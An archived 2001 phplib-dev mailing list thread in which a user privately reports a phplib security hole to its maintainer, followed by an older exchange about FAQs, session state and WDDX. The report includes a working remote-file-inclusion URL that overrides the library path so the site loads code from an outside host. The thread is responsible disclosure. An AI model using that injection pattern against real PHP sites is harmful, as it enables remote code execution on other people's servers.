On Sat, Jul 14, 2001 at 01:07:22PM +0200, giancarlo pinerolo
wrote:
>  I put my site down for now.
>  
>  have a nice weekend
>  
>  Giancarlo
>  Date: Sat, 14 Jul 2001 12:54:23 +0200
>  From: giancarlo pinerolo <giancarlo@[...].net>
>  Organization: navigare.net
>  X-Mailer: Mozilla 4.08 [en] (X11; I; Linux 2.2.12-20smp i686)
>  To: Kristian Koehntopp <kris@[...].de>
>  Subject: security in phplib: PLEASE READ!
>  
>  Hi Kristian
>  
>  Sorry to distur you saturday morning, but I found this tonight
>  Please read the latest from me messages in phplib-dev and phpslash
>  mailing list for an explanation
>  
>  
>  If you'r in a hurry, try this non malicious  URL, which could override
>  all phplib code by including anything from the net
>  
>  http://phplib.netuse.de/showroom/index.php3?_PHPLIB%5Blibdir%5D=http://www.navigare.net/

    autsch!

    tc

>  
>  Ciao
>  
>  Giancarlo Pinerolo
>  
>  
>  Kristian Koehntopp wrote:
>  > 
>  > Giancarlo Pinerolo wrote:
>  > > I really like phplib, and I'd like to help somehow. My skills are what
>  > > they are: never had the time to learn C and am a self learned Linux
>  > > user, although I used to code Assembler/370 for years, before I decided
>  > > to throw my whole IBM mainframe skill out of the window and leave.
>  > 
>  > Well, Boris does not do C, too. Does not keep him from hacking PHP3 code
>  > I have difficulties to understand, though. Isn't there a raising demand
>  > for /370 assembler people now that Y2K approaches? :-) (I would not
>  > touch such a thing, or COBOL, for money... :-)
>  > 
>  > > So for now the best thing I can think of is collecting a FAQ, even if my
>  > > english is so&so.
>  > 
>  > I am looking for someone willing to undertake such a project for the
>  > last few weeks, but so far nobody volunteered. So if you want to do
>  > this, just go ahead. I will provide a file upload system at
>  > phplib.shonline.de as soon as I find time, so that you can maintain a
>  > section of that site without going through me every time.
>  > 
>  > > As of 'the future of PHPLIB', I really think that session management and
>  > > object serialization is already a deep enough area to dig into. I
>  > > realize that great things can be done here.
>  > 
>  > Yes, but not with PHP. For the real thing I would have to abandon PHP
>  > and go for apache itself, incorporating a shared memory manager
>  > maintaining session state, database connections and the like
>  > independently from all programming languages in a memory segment shared
>  > by all Apache slave server processes. Programming languages like Perl
>  > and PHP could plug into an Apache Server API to access this data just as
>  > they access their local data. This would more or less a direct copy of
>  > the ASP system done with the means of the Unix/Apache combo.
>  > 
>  > The other thing, an XML parser for PHP as part of the language and
>  > accessible to PHP itself as well to PHP user functions is just as
>  > pressing. I could do both, but no alone (Boris has left the company) and
>  > not without the funding. At an university, this would be a
>  > two-people-two-years project, but the company I work for would not
>  > finance such an adventure...
>  > 
>  > > For the rest, I went to the WDDX site when it came up in php3-list. I
>  > > had already posed a question there about XML parsing, and someone
>  > > pointed me to EXPAT.
>  > 
>  > WDDX is important, but again, should be done within the Apache API so
>  > that all programming languages that access the server state keeper can
>  > either talk binary to the state keeper or call on this data as WDDX.
>  > They could even insert binary into the state keeper and get it back as
>  > WDDX, so they don't need to carry XML parsers around themselves, which I
>  > think would be a great help for these language plugins...
>  > 
>  > Kristian
>  > 
>  > --
>  > 15.11.1998: Kristian Koehntopp, Knooper Weg 46, 24105 Kiel
>  > "Q:      What's tiny and yellow and very, very, dangerous?
>  >  A:      A canary with the super-user password."
>  >         -- stolen from chuck@[...].com (Chuck Mead)
>  
>  

>  --
>  Abbestellen mit Mail an:   phplib-dev-unsubscribe@[...].de
>  Kommandoliste mit Mail an: phplib-dev-help@[...].de


-- 
Abbestellen mit Mail an:   phplib-dev-unsubscribe@[...].de
Kommandoliste mit Mail an: phplib-dev-help@lists.netuse.de